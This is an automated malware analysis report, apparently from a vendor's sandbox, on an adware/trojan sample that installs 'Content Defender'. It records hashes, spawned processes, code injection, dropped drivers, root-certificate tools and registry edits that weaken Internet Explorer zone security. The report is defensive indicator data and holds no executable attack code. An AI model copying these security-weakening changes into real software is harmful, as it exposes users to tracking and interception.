Adware.Agent.PZM_73060f00dc
Adware.Agent.PZM (B) (Emsisoft), Adware.Agent.PZM (AdAware), Trojan.Win32.Delphi.FD, Trojan.Win32.Sasfis.FD, VirTool.Win32.DelfInject.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan, VirTool, Adware
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Requires JavaScript enabled! |
---|
MD5: 73060f00dc9b5de18019ed1c54bf31f7
SHA1: 68df00837b1f081bfb565dd880b1c948f2f9a1dc
SHA256: 6f457a344a1062a18dbef4a9a975ce2c66ad5ebbe1da11a22e45ee37aa89f2f2
SSDeep: 49152:4KvLOCff8KAeq4gTkaplH1LhcZc dlriLLl4CE9HPUkiYN:46OM0kxwPTHZhcq dUCCE9Hckn
Size: 1926392 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPXv0896v102v105v122Delphistub, UPolyXv05_v6
Company: Transparent Licensed Setup
Created at: 1992-06-20 01:22:17
Analyzed on: WindowsXP SP3 32-bit
Summary:
Adware. Delivers advertising content in a manner or context that may be unexpected and unwanted by users. Many adware applications also perform tracking functions. Users may want to remove adware if they object to such tracking, do not wish to see the advertising caused by the program or are frustrated by its effects on system performance.
Payload
No specific payload has been found.
Process activity
The Adware creates the following process(es):
verclsid.exe:1312
sethome.exe:1364
ConDefSetup1211v2.exe:1984
ContentDefender.exe:304
ContentDefender.exe:1392
The Adware injects its code into the following process(es):
%original file name%.exe:268
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process %original file name%.exe:268 makes changes in the file system.
The Adware creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\{D62137EE-087C-4894-BC4E-F3BCE698C253}\05a00036.exe (7972 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{64A3266F-F6B9-4654-B4E5-9A581A4F08C6}\sethome.exe (53851 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{B979352F-852D-4B26-8E59-8A238895D5EA}\ConDefSetup1211v2.exe (39950 bytes)
The process sethome.exe:1364 makes changes in the file system.
The Adware creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk (1 bytes)
C:\IEXPLORE.bat (208 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Internet Explorer.lnk (1 bytes)
C:\IÕÃÂ¥PLÞRÕ.bðt.exe (601 bytes)
The process ConDefSetup1211v2.exe:1984 makes changes in the file system.
The Adware creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\mozcrt19.dll (7581 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nfregdrv.exe (1821 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\condefclean.exe (7716 bytes)
%Program Files%\Content Defender\nfregdrv.exe (601 bytes)
%Program Files%\Content Defender\nss\smime3.dll (601 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\certutil.exe (6324 bytes)
%Program Files%\Content Defender\ssleay32.dll (2105 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\smime3.dll (7716 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\driver\wfp_windows7_i386.sys (47 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\softokn3.dll (4061 bytes)
%Program Files%\Content Defender\ContentDefenderPS.dll (13 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\certutil.exe (6324 bytes)
%Program Files%\Content Defender\libeay32.dll (9098 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\nspr4.dll (1821 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\ContentDefenderControl.exe (10588 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\import_root_cert.exe (941 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Program Files%\Content Defender\nss\plds4.dll (17 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\driver\wfp_windows8_amd64.sys (58 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\driver\wfp_windows7_i386.sys (3516 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\plds4.dll (17 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\condefclean.exe (7716 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\import_root_cert.exe (6724 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\import_root_cert.exe (941 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\plds4.dll (17 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\ssleay32.dll (4061 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\ContentDefender.zip (37274 bytes)
%Program Files%\Content Defender\nss\softokn3.dll (2105 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\plds4.dll (580 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\ContentDefender.exe (41388 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\softokn3.dll (25100 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\ContentDefender.exe (34724 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\driver\tdi__amd64.sys (61 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\softokn3.dll (25100 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\ContentDefenderPS.dll (6116 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\plc4.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\condefclean.exe (941 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\condefclean.exe (941 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss (4 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\driver\tdi__i386.sys (4012 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\smime3.dll (7716 bytes)
%Program Files%\Content Defender\nss\mozcrt19.dll (4545 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\ContentDefenderPS.dll (941 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\libeay32.dll (86270 bytes)
%Program Files%\Content Defender\nss\nspr4.dll (673 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\driver (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\libeay32.dll (11493 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\ContentDefenderControl.exe (8836 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\ContentDefenderControl.exe (1821 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\driver\wfp_windows7_amd64.sys (4012 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\nspr4.dll (11620 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\ContentDefenderPS.dll (484 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nfregdrv.exe (9476 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\nspr4.dll (11620 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\plc4.dll (20 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\driver\wfp_windows8_amd64.sys (4356 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nfregdrv.exe (9196 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\import_root_cert.exe (6724 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\mozcrt19.dll (7581 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\ContentDefenderControl.exe (1821 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\nss3.dll (24908 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\certutil.exe (941 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\ContentDefender.exe (5381 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64 (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\driver\wfp_windows8_i386.sys (48 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\ssleay32.dll (26028 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\nss3.dll (4061 bytes)
%Program Files%\Content Defender\ContentDefender.exe (3073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\smime3.dll (941 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\plc4.dll (580 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\mozcrt19.dll (48748 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32 (4 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\driver\tdi__amd64.sys (4356 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\softokn3.dll (4061 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\certutil.exe (941 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\driver\tdi__i386.sys (56 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\libeay32.dll (156321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\ContentDefender.exe (6341 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\libeay32.dll (20400 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\plds4.dll (580 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\ssleay32.dll (32684 bytes)
%System%\drivers\contentdefenderdrv.sys (56 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\mozcrt19.dll (48748 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\ssleay32.dll (4861 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\smime3.dll (941 bytes)
%Program Files%\Content Defender\nss\certutil.exe (601 bytes)
%Program Files%\Content Defender\nss\plc4.dll (20 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\nss3.dll (24908 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\ContentDefenderPS.dll (13 bytes)
%Program Files%\Content Defender\ConDefSetup.exe (41020 bytes)
%Program Files%\Content Defender\condefclean.exe (601 bytes)
%Program Files%\Content Defender\import_root_cert.exe (601 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Content Defender\Settings.lnk (804 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\driver\wfp_windows7_amd64.sys (56 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\nspr4.dll (1821 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\nss3.dll (4061 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\plc4.dll (580 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nfregdrv.exe (1821 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\driver\wfp_windows8_i386.sys (3516 bytes)
%Program Files%\Content Defender\nss\nss3.dll (2105 bytes)
%Program Files%\Content Defender\ContentDefenderControl.exe (673 bytes)
The Adware deletes the following file(s):
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\plds4.dll (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nfregdrv.exe (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\ContentDefenderPS.dll (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\ssleay32.dll (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\condefclean.exe (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\nss3.dll (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nfregdrv.exe (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\ContentDefender.zip (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\certutil.exe (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\mozcrt19.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\115[1] (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\smime3.dll (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\plds4.dll (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\softokn3.dll (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\ContentDefender.exe (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\driver\wfp_windows8_amd64.sys (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\ContentDefender.exe (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\certutil.exe (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\nspr4.dll (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\import_root_cert.exe (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\softokn3.dll (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\ContentDefenderPS.dll (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\nss3.dll (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\ContentDefenderControl.exe (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\ssleay32.dll (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\smime3.dll (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\condefclean.exe (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\driver\tdi__i386.sys (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\driver\wfp_windows7_i386.sys (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\nspr4.dll (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\plc4.dll (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\libeay32.dll (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\mozcrt19.dll (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\plc4.dll (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32 (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\driver (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\driver\tdi__amd64.sys (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\driver\wfp_windows8_i386.sys (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64 (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\ContentDefenderControl.exe (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\libeay32.dll (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\import_root_cert.exe (0 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\driver\wfp_windows7_amd64.sys (0 bytes)
The process ContentDefender.exe:304 makes changes in the file system.
The Adware creates and/or writes to the following file(s):
%Program Files%\Content Defender\cert\SSL\ContentDefender 2.cer (774 bytes)
%Program Files%\Content Defender\cert\SSL\cert.db (2 bytes)
Registry activity
The process %original file name%.exe:268 makes changes in the system registry.
The Adware creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKLM\SOFTWARE\Microsoft\ESENT\Process\73060f00dc9b5de18019ed1c54bf31f7\DEBUG]
"Trace Level" = ""
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"
[HKCU\Software\IM]
"1563" = "15-11-16 2:50:23"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "%original file name%.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "708992537"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\{B979352F-852D-4B26-8E59-8A238895D5EA}]
"ConDefSetup1211v2.exe" = "Content Defender Setup"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"LogSessionName" = "stdout"
[HKCU\Software\Microsoft\Direct3D\MostRecentApplication]
"Name" = "%original file name%.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\{64A3266F-F6B9-4654-B4E5-9A581A4F08C6}]
"sethome.exe" = "sethome"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D6 16 E0 10 74 FD 64 CE 10 CD 1D 04 23 CA 6D 73"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"
The Adware modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Adware modifies IE settings for security zones to map all urls to the Intranet Zone:
"IntranetName" = "1"
The Adware modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Adware deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\ESENT\Process\73060f00dc9b5de18019ed1c54bf31f7\DEBUG]
"Trace Level"
The process verclsid.exe:1312 makes changes in the system registry.
The Adware creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CE 36 E4 C7 20 A1 E2 7F 6F B5 26 B1 94 F7 8A F7"
The process sethome.exe:1364 makes changes in the system registry.
The Adware creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\IM]
"1563" = "15-11-16 2:50:13"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Direct3D\MostRecentApplication]
"Name" = "sethome.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "67 DC B6 9A 5E 33 21 37 83 1E C9 27 6C 89 47 82"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The process ConDefSetup1211v2.exe:1984 makes changes in the system registry.
The Adware creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ContentDefender]
"EstimatedSize" = "6000"
"Publisher" = "Artex Management S. A."
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ContentDefender]
"InstallDate" = "20141116"
"DisplayVersion" = "1.80"
